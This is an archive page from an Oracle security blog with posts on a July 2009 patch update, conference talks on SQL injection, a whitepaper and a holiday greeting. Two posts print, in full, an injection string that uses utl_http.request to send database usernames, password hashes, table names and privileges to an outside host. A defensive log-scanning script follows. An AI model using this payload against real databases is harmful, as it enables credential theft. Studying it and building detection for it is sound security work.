Archive for the ‘Allgemein’ Category

Oracle CPU July 2009 published

Wednesday, July 15th, 2009

Last night Oracle released the July 2009 CPU. This CPU contains 30 fixes for several Oracle products. 10 security issues are fixed in the Oracle Database Server. As always, the usual suspects (Esteban, David, Joxean, Alexandr, Dennis) and a few others reported issues in Oracle products.

The 3 most critical bugs this time are related to the TNS Listener, and one of the bugs can be exploited without authentication. These issues (CVE-2009-1020, CVE-2009-1019, CVE-2009-1963) are rated CVSS 9 for Windows and 7.5 for Unix.
Oracle has also fixed 3 of my findings in the database (3 out of 10 :-))

  • SQL Injection in DBMS_EXPORT_EXTENSION (previously fixed in April 2006)
  • Information Disclosure (Password Hash) in Database Vault
  • Information Disclosure (Password Hash) in Audit Vault

More details will be published within the next few days. The updates for our Oracle database scanner Repscan (free trial available) will be released within the next 2 days.

Presentation from Confidence 2009 available

Saturday, May 16th, 2009

I just uploaded the presentation "SQL Injection in Oracle Webapps" to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search for credit card numbers in the database (using dbms_xmlgen), …

Here is one of the sample SQL Injection strings from the presentation. With this SQL Injection string we get all usernames/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http())) in the SELECT clause.

http://victim.com/order.jsp?id=17' or 1=((select
sum(length(utl_http.request('http://www.orasploit.com/'||
username||'='||password) from dba_users)))+((select
sum(utl_http.request('http://www.orasploit.com/'||
owner||'='||table_name) from dba_tables))+((select
sum(length(utl_http.request('http://www.orasploit.com/'||
owner||'='||table_name||'='||column_name)) from dba_users))
+((select sum(length(utl_http.request('http://www.orasploit.com/'||
grantee||'='||granted_role) from
dba_role_privs)))+((select
sum(length(utl_http.request('http://www.orasploit.com/'||
grantee||'='||owner||'='||table_name||'='||privilege||'='||
grantable) from dba_tab_privs)))--

Whitepaper: Penetration from Application down to OS

Monday, April 20th, 2009

A few hours ago I saw that Paul Wright posted an entry on his blog Oracle Forensics about a whitepaper "Penetration from Application down to OS" by Alexandr Polyakov.

In the well-written document, Alexandr explains how to steal the Windows hashes using a fake SMB Server with low privileges (CONNECT, RESOURCE) via Oracle Text. In a previous blog entry in February, "What is more dangerous? ALTER SESSION or OS Access?", I showed how to read files via Oracle Text, and Alexandr used a really smart approach to exploit this issue.

Well done Alexandr…

IT Underground Prague – Presentation

Friday, March 27th, 2009

Just back from the IT Underground 2009 in Prague.

I met several smart security consultants and some of my customers from different countries in Europe (Belgium, Poland, Germany, UK, …) and had a lot of interesting talks.

I gave a presentation concerning SQL Injection in web applications with Oracle backend databases.

Here is a short example from the presentation:

The following (vulnerable) URL sends all usernames/passwords, all accessible tables, tables and columns, roles and privileges to a remote system in a single SQL statement. This can be done with a simple trick. Just use sum(length(utl_http.request(()))).

http://victim.com/order.jsp?id=17' or 1=((select sum(length(utl_http.request('http://www.orasploit.com/'username||'='||password) from dba_users)))+((select sum(length(utl_http.request('http://www.orasploit.com/'owner||'='||table_name) from dba_tables)))+((select sum(length(utl_http.request('http://www.orasploit.com/'owner||'='||table_name||'='||column_name)) from dba_users))+((select sum(length(utl_http.request('http://www.orasploit.com/'grantee||'='||granted_role) from dba_role_privs)))+((select sum(length(utl_http.request('http://www.orasploit.com/'grantee||'='||owner||'='||table_name||'='||privilege||'='||grantable) from dba_tab_privs)))--

More details in the presentation.
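For defenders, requests like the one shown in this post and in the Confidence 2009 post above leave a recognisable trace in web server logs. The following is an added example, not code from the presentation: a log scanner that decodes each query parameter (including nested URL encoding) and reports any parameter that calls utl_http.request, together with the dictionary views it reads and the destination host to block at egress. It assumes Apache-style access log lines; the sample lines, addresses and the host oob.example.test are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Indicators taken from the injection string shown in the posts above.
OOB_CALL = re.compile(r"utl_http\s*\.\s*request\s*\(", re.I)
DICT_VIEW = re.compile(r"\b(dba_users|dba_tables|dba_role_privs|dba_tab_privs)\b", re.I)
DEST_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (hypothetical hosts and addresses).
SAMPLE_LOG = [
    '198.51.100.4 - - [16/May/2009:10:11:58 +0200] "GET /order.jsp?id=17 HTTP/1.1" 200 812',
    '203.0.113.7 - - [16/May/2009:10:12:01 +0200] "GET /order.jsp?id=17%27%20or%201%3D'
    '((select%20sum(length(utl_http.request(%27http://oob.example.test/%27%7C%7Cusername)))'
    '%20from%20dba_users))-- HTTP/1.1" 200 812',
    # Same idea, double URL-encoded with extra whitespace before the parenthesis.
    '203.0.113.7 - - [16/May/2009:10:12:09 +0200] "GET /order.jsp?id=17%2527%2520or%25201%253D'
    '(select%2520sum(length(utl_http%252Erequest%2520(%2527http://oob.example.test/%2527'
    '%257C%257Ctable_name)))%2520from%2520dba_tables)-- HTTP/1.1" 200 812',
]

def normalise(value, max_rounds=3):
    """Undo nested URL encoding, drop /* */ comments, collapse whitespace."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value)

def scan_line(line):
    """Return one finding per query parameter that contains utl_http.request(."""
    m = REQUEST.search(line)
    url = urlsplit(m.group(1) if m else "")  # no request line: nothing to scan
    findings = []
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        value = normalise(raw)
        if OOB_CALL.search(value):
            findings.append({
                "path": url.path, "param": name,
                "calls": len(OOB_CALL.findall(value)),
                "views": sorted({v.lower() for v in DICT_VIEW.findall(value)}),
                "hosts": sorted({h.lower() for h in DEST_HOST.findall(value)}),
            })
    return findings

if __name__ == "__main__":
    print([f for line in SAMPLE_LOG for f in scan_line(line)])
```

A hit only shows that the request was attempted; whether data left the database depends on the application being injectable and on the database host being allowed to make outbound HTTP connections.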

Merry Christmas

Wednesday, December 24th, 2008

Dear Reader,

I wish you (and your families) a merry Christmas and a happy new year.

P.S.: This lovely baby is our daughter Anna. Already 10 months old…